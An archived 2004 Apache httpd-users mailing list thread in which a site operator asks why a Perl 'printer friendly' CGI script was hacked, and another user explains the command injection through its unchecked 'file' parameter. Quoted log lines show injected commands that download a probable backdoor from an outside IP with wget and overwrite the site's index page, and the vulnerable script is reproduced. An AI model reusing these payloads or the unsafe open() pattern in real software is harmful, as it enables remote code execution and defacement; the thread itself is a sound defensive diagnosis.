httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Ivan Barrera A." <Br...@Ivn.cl>
Subject Re: [users@httpd] Security Problem
Date Sun, 05 Dec 2004 22:18:29 GMT
As i see, you take the parameter file from the URL without parsing it 
(as dick explained on other post too)

  my $data_file =
  "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
  if (!open(FILE,"$data_file")) { die "Can't open";}

You are not checking if the file is really valid, and are passing 
additional cmds without even noticing. (the pipe is really dangerous)

As Dick said... ask your programmer to fix this right up. (and try to 
examine your machine.. it may be already comprimsed.. if in redhat run 
rpm -VVV procps net-tools util-linux rpm , if nothing comes up, your good)



Murthy Ambaru wrote:
> Thanks for the explanation.So the file can be downloaded to /tmp/bind 
> directory in the server executing that script. As i said, i tried typing 
> in the URL used and got nothing. I did not check the /tmp/bind though(I 
> did not find that in the interface that i use to manage files on 
> server). So what would be an secure way of opening the file?
> The script is in PERL. I am adding it below. Can you see anything weird 
> in it?? Thanks...
>  
> #!/usr/local/bin/perl
> print "Content-type: text/html\n\n";
> &parseForm;
> open(HEADER,"printheader.html") ;
> my @HEADER = <HEADER>;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
> my $data_file = 
> "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> if (!open(FILE,"$data_file")) { die "Can't open";}
> my @FILE = <FILE>;
> close(FILE);
> $print = 1 ;
> foreach $line(@FILE) {
>         if ($line =~ /beginimage/) {
>                 print $line ;
>                 $print = 0;
>                 next ;
>         }
>         if ($line =~ /endimage/) { $print = 1 ; }
>         if ($print eq "1") {
>                 print $line;
>         }
> }
> 
> ########################################################
> sub parseForm {
>     if ($ENV{'REQUEST_METHOD'} eq 'GET') {
>         # Split the name-value pairs
>         @pairs = split(/&/, $ENV{'QUERY_STRING'});
>     }
> elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> 
>  read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
>    # Split the name-value pairs
>    @pairs = split(/&/, $buffer);
> }
>    foreach $pair (@pairs) {
>       ($name, $value) = split(/=/, $pair);
>       # Un-Webify plus signs and %-encoding
>       $value =~ tr/+/ /;
>       $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
>       $FORM{$name} = $value;
>       }
> }
> 
> 
> */"Ivan Barrera A." <Bruce@Ivn.cl>/* wrote:
> 
>     I mean, the cgi script (which i dont know anything about) seems to
>     "open
>     " a file reffered by ?file= ... Probably an insecure way of "opening"
>     the file, leads to execute the rest of the statement.
> 
>     Look :
> 
>     ?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind
> 
>     After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind
>     is appended. So , if the script execute this, the command wget will
>     exec, and download that file into /tmp/bind.
>     After that, using the same technique, you can exec anything you
>     want. so
>     the problem is the way of opening (or doing something else) to the
>     files
>     in the cgi script.
>     is it a c , perl , php , or any other language script ?
> 
>     Murthy Ambaru wrote:
>      > Thanks for the response Ivan. I am sorry i realy did not
>     understand what
>      > you mean by "download the file to /tmp/bind". when the printer
>     friendly
>      > link is clicked, this is the URL that will be accessed:
>      > http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
>      > ofcourse it depends on the page being clicked at. So the file
>     name will
>      > be passed as parameter to the CGI file. I included the CGI code
>     in my
>      > earlier mail, could you please take a look.
>      > Thanks,
>      > Murthy
>      >
>      > */"Ivan Barrera A." /* wrote:
>      >
>      > the url you entered, download the file bind to /tmp/bind . It's
>      > probably
>      > an irc bot or a backdoor.
>      > If someone did that, the version of the cgi script, is unsecure, and
>      > should be revised.
>      >
>      > Im sorry if i didnt clarify enough, but would be useful to see
>     that cgi.
>      >
>      > Murthy Ambaru wrote:
>      > > I have a question regarding security. There is a web site that
>      > has an
>      > > printer friendly version of web pages being dsiplayed using a CGI
>      > > script. Apparently when this was in use, the site was hacked and
>      > some
>      > > unwanted stuff posted on the site. I had a look at the access.log
>      > when
>      > > this occurred and this was what showed up(I just replaced the
>      > site name
>      > > with xyz, everything else is same):
>      > >
>      > >
>      > > /images/newswireprint.gif HTTP/1.0" 304 -
>      > >
>      > > "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
>      > >
>      > > 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
>      > >
>      > >
>      > > GET
>      > >
>      >
>     /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
>      > > hosts/xyz.org/httpdocs/index.html|
>      > >
>      > > Can anyone understand how are they able to hack? I tried
>      > reproducing it
>      > > by typing in the above URL used by hackers, but could get nothing
>      > out of
>      > > it. The permissions on all the html docs folders are set to 755.
>      > >
>      > > Below is the CGI file being used. It basically strips images off.
>      > Can
>      > > anyone help with this problem? what should i be looking at to
>      > plug off
>      > > the security holes....Thanks a lot
>      > >
>      > > -Murthy
>      > >
>      > >
>      > >
>      > > #!/usr/local/bin/perl
>      > >
>      > > print "Content-type: text/html\n\n";
>      > >
>      > > &parseForm;
>      > >
>      > > open(HEADER,"printheader.html") ;
>      > > my @HEADER = ;
>      > > close(HEADER);
>      > > #print it! Put a # before print if you don't want a header
>     printed...
>      > > print "@HEADER";
>      > >
>      > > my $data_file =
>      > > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
>      > >
>      > > if (!open(FILE,"$data_file")) { die "Can't open";}
>      > > my @FILE = ;
>      > > close(FILE);
>      > >
>      > > $print = 1 ;
>      > >
>      > > foreach $line(@FILE) {
>      > >
>      > > if ($line =~ /beginimage/) {
>      > > print $line ;
>      > > $print = 0;
>      > > next ;
>      > > }
>      > >
>      > > if ($line =~ /endimage/) { $print = 1 ; }
>      > >
>      > > if ($print eq "1") {
>      > > print $line;
>      > > }
>      > >
>      > > }
>      > >
>      > >
>      > > ########################################################
>      > >
>      > > sub parseForm {
>      > >
>      > > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
>      > > # Split the name-value pairs
>      > > @pairs = split(/&/, $ENV{'QUERY_STRING'});
>      > > }
>      > > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
>      > >
>      > >
>      > > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
>      > >
>      > > # Split the name-value pairs
>      > > @pairs = split(/&/, $buffer);
>      > > }
>      > > foreach $pair (@pairs) {
>      > > ($name, $value) = split(/=/, $pair);
>      > >
>      > > # Un-Webify plus signs and %-encoding
>      > > $value =~ tr/+/ /;
>      > > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
>      > >
>      > > $FORM{$name} = $value;
>      > > }
>      > >
>      > > }
>      > >
>      > >
>      > >
>      > >
>      > >
>      >
>     ------------------------------------------------------------------------
>      > > Do you Yahoo!?
>      > > Meet the all-new My Yahoo! – Try it today!
>      >
>      > ---------------------------------------------------------------------
>      > The official User-To-User support forum of the Apache HTTP Server
>      > Project.
>      > See for more info.
>      > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>      > " from the digest: users-digest-unsubscribe@httpd.apache.org
>      > For additional commands, e-mail: users-help@httpd.apache.org
>      >
>      >
>     ------------------------------------------------------------------------
>      > Do you Yahoo!?
>      > The all-new My Yahoo! – What will yours do?
> 
>     ---------------------------------------------------------------------
>     The official User-To-User support forum of the Apache HTTP Server
>     Project.
>     See for more info.
>     To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>     " from the digest: users-digest-unsubscribe@httpd.apache.org
>     For additional commands, e-mail: users-help@httpd.apache.org
> 
> ------------------------------------------------------------------------
> Do you Yahoo!?
> Yahoo! Mail - 250MB free storage. Do more. Manage less. 
> <http://us.rd.yahoo.com/evt=29915/*http://info.mail.yahoo.com/mail_250>

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message